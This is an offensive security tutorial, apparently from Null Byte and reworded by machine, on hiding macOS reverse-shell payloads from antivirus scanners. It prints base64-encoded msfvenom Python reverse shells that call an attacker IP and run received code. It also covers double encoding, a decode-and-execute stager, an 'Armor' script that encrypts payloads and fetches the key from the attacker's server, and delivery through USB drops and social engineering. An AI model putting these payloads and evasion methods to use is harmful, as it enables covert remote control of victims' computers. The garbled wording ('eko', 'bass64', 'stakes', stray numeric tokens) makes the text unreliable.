How To Create An Undetectable Payload «Null Byte :: WonderHowTo

Encrypting payload and coding stackers are more effective against macOS than you might think. In addition, it's very easy to avoid VirusTotal and macOS antivirus programs with a few simple tricks.

The objective of this project was to find a well-known and easily detectable MacOS payload and then find a method that enabled the same payload to perform on the MacBook's target. This would reliably confirm whether any discovered avoidance method was effective in implementing known payloads. In addition to testing malicious files against VirusTotal, they were tested in macOS Mojave (v10.14) against popular antivirus programs like Avast, AVG, BitDefender, Sophos and ClamXAV.

Readers should not confuse this topic by circumventing GateKeeper or System Integrity Protections (SIP). Performing an unsigned application and avoiding virus scanners are two different topics. The focus of this article will be to avoid detection of antivirus software and VirusTotal. As we will see below, in most cases, only encoding a payload is sufficient for antivirus detection.

IHR3byB0aHJ1ZQ0 =
eko "and two three four" | base64
b251IHR3byB0aHJ1ZSBmb3VyCg ==
eko "and two three four five" | base64
All strings can be easily decoded ( -d in Kali, -D in macOS) using the command below.

base64 -d <<< & # 39; b25lIHR3byB0aHJ1ZSBmb3VyIGZpdmUK

Notice that the end of the strings changes subtly, while the beginning always begins to be the same. The same goes for most of the payloads. If only the IP address and port number are changed, the beginning of the produced base 64 coded payload will always be the same for each hacker and pentester with msfvenom. Below is an example created by msfvenom with the IP address "10.42.0.1." [19659007] aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo = [19659008] The below msfvenom output use the same payload but with a different IP address "192.168.0.2". [19659007] aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMC4yJyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc + SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg == [19659008] No matter what IP and port is used, the first 142 characters are always identical when using this msfvenom payload. If it is not decoded and analyzed for fake code, it would at least seem reasonable that the antivirus program detects common bass64 strings - but they do not.

Save this decrypted Python code to a file named "thisfileisevil_without_encoding.py" and upload it to VirusTotal resulted in the following 1/56 detection rates.

Interestingly, the raw Python code got an even lower detection rate.

At this point, it is unclear exactly what VirusTotal and antivirus programs are trying to detect. They do not do a good job of decoding bass64 strings or flagging the 13 lines Python generated by msfvenom, which has undoubtedly been used thousands of times by various pioneers and hackers over the years.

Double Base64 Encoded Payloads

If a common coded payload is capable of avoiding most antivirus programs, double coding it should be an efficient technique too, right? Well, not really. Encoding the encrypted msfvenom output and upload to VirusTotal resulted in the following 1/54 detection.

Again detects 1/54 discovery by Microsoft, which does not help all macOS with antivirus software. This was achieved by first coding the msfvenom output - the same as the payload previously discovered.

Here printf and base64 use the MacBook to decode -D ) the string and immediately execute the command ( -c ) with Python - which again decodes the internal payload and creates a reverse TCP connection.

To my surprise, both VirusTotal and popular antivirus programs are avoided in this way. Not a tested antivirus software could detect a double-coded payload in the form of a text file or an AppleScript.

Encrypted payload

Until now, we have learned that encoding and double-coding payload will avoid detection of most antivirus programs (even if it is better using raw code). Nevertheless, coding scripts and payload a cat and mouse game between hackers and antivirus developers. It's just a matter of time before anyone at AVG or Avast discovers this Null Byte article and antivirus scanners start recursively decoding base64 strings and looking for common coded signatures.

This made me think of a more reliable method of defeating macOS antivirus; a solution that is a bit more difficult to detect and prevent. Encrypting the payload, in addition to encoding it, will provide a better solution to avoid antivirus scanners.

Why is encryption better than encoding?

The primary disadvantage of coding is the ability of the antivirus program to continuously decode base64 strings and easily detect the embedded payload. No matter how many times an attacker encodes his payload, it can be reversed. By encrypting the payload, the antivirus program will eventually find a series of unreadable data. The encrypted payload can not be scanned by AV software or read by people - not without knowing the decryption key.

What takes me to Armor, a simple shell script I created to illustrate how the encryption of macOS payload can be automated and executed.

How the "Armor" Script Works

Armor will encrypt the content in which file it is given. The file can contain a single-color file, a complex Python script with hundreds of code lines, or a post-exploitation script written in any programming language supported by macOS. The file content is encrypted with a one-time key. The key is then temporarily hosted on the attacker's server and loaded by the MacBook goal to decrypt the payload.

There are some things happening in this GIF. I explain each step in order.

A Netcat listener is started at port 4444. The file "payload.txt" is read and displayed to contain a simple Bash liner that, when it's running, will create a TCP connection between the MacBook's target on the attacker's Netcat listener . Armor is used to encrypt the bash one-liner. Ncat is used to host the decryption key on the attacker's server. When the stagger runs in target MacBook (not shown in GIF) decrypts and runs bash liner without writing any data to the hard drive. Ncat immediately terminates the listener after the key has been used. Once the Netcat connection is established, the attacker has remote access to the MacBook target.

For a technical explanation of what the script does and how it executes commands without writing data to the target hard drive, proceed to my GitHub page to see the comments. Readers interested in giving Armor a quick test run can follow the following steps.

Step 1: Install Armor

Armor can be found on my GitHub page and cloned with the command below.

The address 1.2.3.4 is the attacker's IP address where the decryption key will be hosted. This may be a local IP (for example, "192.168.1.2") or a virtual private server address. The Ncat server uses this address and port number ( 443 ) to host the decryption key. Port 443 can be any free port in the attacker's Kali Linux system.

If LibreSSL (version of OpenSSL used by macOS) is not found in Kali, Armor will try to install it. Unfortunately, the version of OpenSSL contained in Kali / Debian is not compatible with MacOS & LibreSSL, unfortunately.

Step 4: Start Ncat Listener

Before driving, start the Ncat listener. Armor tries to start it automatically.

Step 5: Perform Stager

Armor will produce an encrypted and encrypted command intended for the MacBook target. This stacker may be embedded in an AppleScript for USB drop attacks, used in USB Rubber Ducky attacks, or may be utilized in other social-tech attacks. For now, we'll just copy and paste the stakes into a MacBook terminal. [19659000] When the stakes are running, the MacBook terminal will list ( ls ) all ( -a )

We've Encrypted a single command ls but imagine the possibilities when applying the same degree of obfuscation to a sophisticated Python script designed to perform a series of advanced attacks. Antivirus software currently does not decode base64 strings - and even if they did, the embedded and encrypted payload could not be read.

Improve Attack

Armor is not perfect. It is a bit of proof of the concept that readers will hopefully find ways to improve. An alternative to LibreSSL, for example, because most Debian and Kali distros do not have it installed by default, it's a bit uncomfortable as an encryption solution.

Handling the decryption key on the attacker's server is dangerous. If the attacker's IP address is detected in stager, it may be possible to calculate the key's filename and download it. The key would enable the target to convert the encrypted payload and learn what type of exploitation performed on the MacBook.

In addition, it is a way to encrypt payloads that are not dependent on the goal being connected to the Internet (to download the decryption key) Effectively.

Final Thoughts

After testing these attacks against VirusToal and at least six popular antivirus programs, no one could discover a double-coded payload. MacOS antivirus scanners almost do not seem to identify even the most common encodered payloads. Detecting something created by Armor will prove to be much more challenging for today's macOS antivirus scanners.

In addition, macOS explains too much on GateKeeper to prevent malware from being opened. As shown in an earlier article, GateKeeper protection is not applied to USB devices that are inserted into the MacBook, so the targets can be socially designed to open malicious files.

In order to proactively prevent such attacks, readers should check "How to Protect yourself from MacOS Attacks."